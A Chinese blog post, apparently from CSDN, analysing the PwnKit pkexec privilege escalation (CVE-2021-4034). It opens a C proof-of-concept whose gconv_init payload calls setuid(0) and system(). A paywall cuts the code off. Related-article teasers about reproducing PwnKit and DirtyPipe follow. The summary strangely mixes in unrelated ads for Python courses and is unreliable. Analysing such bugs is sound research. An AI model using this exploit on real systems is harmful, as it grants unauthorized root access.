pwnkit漏洞分析-CVE-2021-4034

最新推荐文章于 2025-10-11 21:10:02 发布
原创 最新推荐文章于 2025-10-11 21:10:02 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#计算机

本文详细分析了pwnkit漏洞(CVE-2021-4034),主要讨论如何通过改变GCONV_PATH环境变量,利用Python微信订餐小程序和量化交易系统的例子,阐述了通过execve命令执行程序并修改环境变量,最终通过g_printerr函数和编码转换实现提权,获取root shell。

Python微信订餐小程序课程视频

https://edu.youkuaiyun.com/course/detail/36074

Python实战量化交易理财系统

https://edu.youkuaiyun.com/course/detail/35475
研究了一下前段时间的Polkit提权漏洞,里面有很多以前不知道的技巧。漏洞很好用,通杀CENTOS、UBUNTU各版本。

主要是分析这个POC触发原理。POC如下:

/*
 * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis 
 * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
 */
#include 
#include 
#include 

char *shell = 
 "#include \n"
 "#include \n"
 "#include \n\n"
 "void gconv() {}\n"
 "void gconv\_init() {\n"
 " setuid(0); setgid(0);\n"
 " seteuid(0); setegid(0);\n"
 " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:
最低0.47元/天 解锁文章
漏洞复现】CVE-2021-4034 pkexec提权漏洞
李同學的安全圈
02-10 3187
文章目录声明一、漏洞概述二、影响范围三、本地环境复现四、修补建议总结漏洞原理深层剖析 声明 本文章仅用于学习和技术研究,切勿用于非授权情况下的攻击测试行为,如因此产生的一切不良后果与文章作者无关!!! 一、漏洞概述 Linux Polkit 的 pkexec程序中发现了一个本地权限提升漏洞。pkexec应用程序是一个 setuid 工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。 由于当前版本的 pkexec 无法正确处理调用参数计数,并最终会尝试将环境变量作为命令执行。 攻击者可以通
Web到Linux-内核溢出Pwnkit
2401_85783544的博客
08-29 531
复现环境:解压DarkHole.zip,导⼊虚拟机。
Linux 系统服务漏洞PwnKit 已存在12年,可获得所有主流发布版本的root 权限
smellycat000的专栏
01-26 542
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士所有Linux主流发行版本默认配置的 Polkit pkexec 组件中存在一个漏洞 (CVE-2021-4034),可用于获得完整的系...
PwnKit提权漏洞复现:原理分析+环境搭建+渗透实践(CVE-2021-4034)
最新发布
mooyuan的网络安全博客
10-11 1365
PwnKit提权漏洞(CVE-2021-4034)是Polkit组件pkexec工具中的高危本地权限提升漏洞,影响多数Linux发行版。文章详细介绍了漏洞原理:pkexec处理环境变量时存在缺陷,可被利用执行任意代码获取root权限。通过Vulhub搭建漏洞环境,使用SSH登录普通用户后,下载并编译PoC脚本,最终成功实现权限提升至root。整个渗透过程包括环境准备、漏洞复现和提权验证,展示了该漏洞的稳定利用性。
CVE-2021-4034漏洞复现
qq_75161850的博客
03-17 1648
漏洞是 Linux 系统中 Polkit 组件的 pkexec 工具存在的本地权限提升漏洞,也被称为。
【二进制漏洞pwn简单分析
qq_21119415的博客
01-28 647
输入,这里没有限制用户输入典型的栈溢出漏洞,并且传入变量为&S,因此这里需要输入多个字符串,覆盖掉返回地址。第五步:查找敏感函数,在fun函数里面,执行bin/sh,这里要明白汇编命令,push是压栈,即开始位置,它的起始地址是401168。此处双击&s来定位本漏洞最核心位置,main函数的堆栈地址区域,数一数从输入到执行结束一共需要多少个字节,即多少行,十五行。1,打开main函数,查看逻辑和运行时候的文字(此处需要读取汇编语 言)覆盖到后门位置,即backdoor,然后寻找后门的地址,
CVE-2021-4034漏洞详细原理以及复现,polkit的pkexec中的本地提权漏洞
Ba1_Ma0的博客
04-11 6828
简介 一个隐藏了12年的危险漏洞,利用的是polki的pkexec,它是一个 SUID 根程序,默认安装在每个主要的 Linux 发行版 Null 当你在linux下要查看文件时,运行列如像cat这样的程序,并提供test.txt作为参数 所以整个参数数组看起来如下: cat test.txt 0 1 cat是第一个参数索引’0’,第一个参数通常是程序本身的名称,在我们的例子中它是cat 第二个参数是我们刚刚提供带有索引’1’的test.txt的文件名,这些都是字符串 但是在内存中,过程看起来像
CVE-2021-4034
02-06
**CVE-2021-4034:Linux中的Pwnkit提权漏洞** CVE-2021-4034,也被称为“Pwnkit”,是Linux操作系统中的一个严重安全漏洞,该漏洞影响了pkexec工具,允许攻击者以root权限执行任意代码,从而实现本地提权。这个漏洞...
PwnKitCVE-2021-4034-Linux提权脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特权用户通过在默认配置中利用该漏洞来获得...3.执行./cve-2021-4034
Linux下Polkit 权限提升漏洞复现(CVE-2021-4034
oiadkt的博客
03-14 976
Linux下Polkit 权限提升漏洞复现(CVE-2021-4034
liunx提权Pwnkit
2301_79270117的博客
04-11 276
上传linpeas.sh文件扫描提权漏洞。用msf自带的pwnkit模块提权。修改密码的地方存在垂直越权漏洞。就是修改了id=1用户的密码。将id=3改成id=1。
pwnedit:CVE-2021-3156 - Sudo Baron Samedit
08-04
编辑 CVE-2021-3156 - Sudo Baron Samedit 在进入技术细节之前,您可以在此处观看简短摘要: : 剧集 [| | ] 为什么选择 sudo 作为研究对象? [| | ] 使用 AFL 进行模糊测试的工作原理 [| | ] AFL 模糊问题故障排除 [| | ] 使用模糊测试查找缓冲区溢出 [文件| 博客| 视频] 通过模糊测试发现崩溃? 最小化 AFL 测试用例 [文件| 博客 | 视频] 使用 AddressSanitizer (ASan) 进行根本原因分析 [文件| 博客 | 视频] 理解 C 指针魔术算术 ... 即将推出 要求 安装Docker并确保它与docker ps运行。 使用说明 每个剧集文件夹都包含视频中使用的文件和代码片段。 最重要的是Dockerfile ,它可用于运行易受 sudoedit 漏洞攻击的隔离系统。 如果您想更
TryHackMe-Pwnkit_CVE-2021-4034
M1n9K1n9的博客
12-23 451
事实上pwnkit我已经用很多次了,感受到了其通用性的强大,我第一次使用它只是一次偶然的了解到,于是便一发不可收拾。那么我们今天就来了解一下原理吧CVE-2021-4034(俗称“Pwnkit”)是一个可怕的 Local Privilege E扩展 (LPE) 漏洞,位于 Linux 操作系统(以及许多其他 *nix 操作系统)上默认安装的“Polkit”包中。
pwn环境搭建_pwn入门学习(一)—— 环境搭建
weixin_39609670的博客
12-19 376
pwn入门学习(一)—— 环境搭建疫情期间学习技术#中国加油##武汉加油#所用环境为Ubuntu 18.04更换Ubuntu下载镜像源Ubuntu默认下载源在美国,相对速度较慢,可将其下载镜像源更换为国内镜像。清华开源软件镜像站Ubuntu:mirrors.tuna.tsinghua.edu.cn/help/ubuntu/具体操作:(1) 备份源文件cd /etc/aptsudo cp sourc...
ECTouch 电商微信小程序 SQL注入漏洞复现(CVE-2023-39560)
0xSec
01-20 1247
ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL注入,获取数据库敏感信息。
权限提升-Linux系统权限提升篇&内核溢出&辅助项目&Vulnhub&Dirty Pipe&Pwnkit&dirtycow
SuperherRo的博客
03-29 1381
1、Web到Linux-内核溢出-权限认知&信息收集 2、Web到Linux-提权项目-漏洞筛选&配置安全 3、Web到Linux-内核溢出-dirtycow(CVE-2016-5159) 4、Web到Linux-内核溢出-Pwnkit (CVE-2021-4034) 5、Web到Linux-内核溢出-DirtyPipe (CVE-2022-0847) 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
记 linux 系统编译好的exp提权提示无gcc
qq_42077227的博客
11-26 2301
提权无gcc
linux 下中文编码转换问题
ipqwcwt的专栏
10-13 1811
目标:接收网络传过来的字节序,转换字符串 全英文的情况下直接保存string即可,带中文的情况试了好久故做如下记录。 1. 首先确认gcc 应该是utf-8的格式来存储字符串的 通过cmake 加入-fexec-charset=xxx报错如下 add_compile_options(-fexec-charset=xxx)      /usr/lib/gcc/x86_64-linux-gn...
CVE-2021-4034漏洞 麒麟v10涉及吗?
09-20
先快速回忆一下这个漏洞的背景——CVE-2021-4034是2022年初曝光的Polkit权限提升漏洞,俗称"PwnKit",影响范围极广,几乎涉及所有Linux发行版。 翻看用户提供的引用资料,虽然没直接提到CVE-2021-4034,但引用[1]...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值